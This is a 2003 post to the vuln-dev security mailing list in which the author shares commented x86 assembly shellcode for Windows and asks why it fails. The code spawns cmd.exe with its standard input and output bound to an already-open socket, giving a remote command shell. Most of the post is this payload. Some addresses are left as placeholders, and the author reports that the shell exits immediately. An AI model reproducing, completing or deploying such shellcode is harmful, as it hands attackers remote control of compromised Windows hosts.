Re: Windows reverse Shell

From: Berend-Jan Wever (skylined@edup.tudelft.nl)
Date: 02/05/03

    Date: 5 Feb 2003 00:54:44 -0000
    From: Berend-Jan Wever <skylined@edup.tudelft.nl>
    To: vuln-dev@securityfocus.com
    
    
    In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

    I wrote a little piece of shellcode that should spawn a shell using a
    socket in %ebp, which will execute cmd.exe successfully. The problem is
    that cmd.exe dies right away. Has anybody got an idea why? The source
    (asm for linux) is included.

    Kind regards,

    Berend-Jan Wever

        # MakeStringAndNegEbx
        # Scans forward from %edi for the first ',' and overwrites that byte
        # with 0, turning the comma-separated list that follows the code into
        # NUL-terminated strings one at a time. It also negates %ebx.
        # In:   %edi = start of a string, %ebx = value to negate
        # Out:  %edi = one byte past the new terminator, %ebx = -%ebx
        # Clobbers: %al, %ecx, flags
        # Note: the store writes into the bytes following the code, so the
        # buffer this runs from must be writable as well as executable.
        Start:
        MakeStringAndNegEbx:
          mov $',', %al # byte to scan for
          xor %ecx, %ecx
          dec %ecx # %ecx = -1: effectively unbounded scan length
          repne scasb # search for ','; stops with %edi one past it
          sub %al, -1(%edi) # ',' - ',' = 0: terminate the string in place
          neg %ebx
          ret
        
        # GetLibraryAndProcAddress
        # Resolves the procedure named after the library name at %edi, i.e.
        # GetProcAddress(LoadLibraryA(lib), proc), per the comments below.
        # In:   %edi = "lib,proc," (comma-terminated, see MakeStringAndNegEbx)
        # Out:  %eax = result of the second indirect call; %edi = past "proc,"
        # Clobbers: %ebx, %ecx, flags, plus whatever the called routines clobber
        # Both calls go through a pointer stored at the address that ends up in
        # %ebx: the immediates are the negated forms of those addresses and the
        # author left them as 0xXXXXXX placeholders.
        GetLibraryAndProcAddress: # {
          push %edi # > libName (pushed before %edi is advanced)
          mov $-0xXXXXXX, %ebx # negated address of the LoadLibraryA pointer
          call MakeStringAndNegEbx # put 0 after libName; %ebx = +0xXXXXXX
          call *(%ebx) # < LoadLibraryA(libName); %eax = returned handle

          push %edi # > procName
          push %eax # > libHandle
          mov $-0xXXXXXX, %ebx # negated address of the GetProcAddress pointer
          call MakeStringAndNegEbx # put 0 after ProcName
          call *(%ebx) # << GetProcAddress(libHandle, procName); %eax = result
          ret
        # }

        # main1
        # Builds a STARTUPINFO and a PROCESS_INFORMATION on the stack, then
        # calls the routine resolved by GetLibraryAndProcAddress (CreateProcessA,
        # per the string table) with the command line that follows the code.
        # In:   %ebp = socket handle (set by EntryPoint)
        #       top of stack = return address of `call main1`, i.e. the address
        #       of the "cmd.exe,kernel32.dll,CreateProcessA," data after End
        # Out:  never returns; spins at InfinitLoop
        # What a host-based monitor sees: a child process whose three standard
        # handles are a socket, created with bInheritHandles = 1 - the artifact
        # process-creation telemetry keys on for socket-backed shells.
        main1:
          # %ebp = socket
          pop %edi # < %edi = &strings (return address of `call main1` = End)
          
          # create a struct StartupInfo on the stack.
          # 17 dwords are pushed = 0x44 bytes, matching the cb field below.
          # Fields are pushed last-to-first because the stack grows down.
          xor %eax, %eax
          push %ebp # HANDLE hStdError = socket
          push %ebp # HANDLE hStdOutput = socket
          push %ebp # HANDLE hStdInPut = socket
          push %eax # LPBYTE lpReserved2 = NULL
          inc %eax # WORD cbReserved2 = 0;
          push %eax # WORD wShowWindow = 1; (one dword covers both WORD fields)
          mov %al, %ah # 0x101
          push %eax # DWORD dwFlags = STARTF_USESHOWWINDOW |
          xor %eax, %eax # STARTF_USESTDHANDLES
          push %eax # DWORD dwFillAttribute = 0
          push %eax # DWORD dwYCountChars = 0
          push %eax # DWORD dwXCountChars = 0
          push %eax # DWORD dwYSize = 0
          push %eax # DWORD dwXSize = 0
          push %eax # DWORD dwY = 0
          push %eax # DWORD dwX = 0
          push %eax # LPTSTR lpTitle = NULL (program name)
          push %eax # LPTSTR lpDesktop = NULL (inherit)
          push %eax # LPTSTR lpReserved = NULL
          mov $0x44, %al
          push %eax # DWORD cb = 0x44 (length);
          mov %esp, %esi # %esi = &StartupInfo

          # create a struct ProcessInformation on the stack (4 dwords, zeroed).
          xor %eax, %eax
          push %eax # HANDLE hProcess;
          push %eax # HANDLE hThread;
          push %eax # DWORD dwProcessId;
          push %eax # DWORD dwThreadId;

          # create a process with STD I/O handles hooked to socket.
          # Ten arguments, pushed right-to-left.
          push %esp # > lpProcessInformation -> stack (%esp = &ProcessInformation here)
          push %esi # > lpStartupInfo -> stack
          push %eax # > lpCurrentDirecty: NULL
          push %eax # > lpEnvironment: NULL
          push %eax # > dwCreationFlags: 0
          inc %eax
          push %eax # > bInheritHandles: 1 (true)
          dec %eax
          push %eax # > lpThreadAttributes: NULL
          push %eax # > lpProcessAttributes: NULL
          push %edi # > lpCommandLine: &('cmd.exe') (still comma-terminated at this point)
          push %eax # > lpApplicationName: NULL
          call MakeStringAndNegEbx # put 0 after commandline; %edi -> "kernel32.dll,..."; %ebx negated but unused here
          call GetLibraryAndProcAddress # LoadLibrary and GetProcAddress; %eax = resolved routine
          call *%eax # <<<<<<<<<< CreateProcess(...);
          
        InfinitLoop:
          jmp InfinitLoop # wait forever; the calling thread never regains control.

        # EntryPoint
        # Loads the socket handle from the stack at a fixed offset (0xXX is a
        # placeholder left by the author) into %ebp and enters main1.
        # `call main1` pushes the address of End, which is where the string
        # table begins; main1 pops that as its string pointer.
        EntryPoint:
          lea 0xXX(%esp), %eax # socket is on the stack at XX (placeholder offset)
          mov (%eax), %ebp # socket
          call main1
        End:

    The code is followed by this string:
        "cmd.exe,kernel32.dll,CreateProcessA,"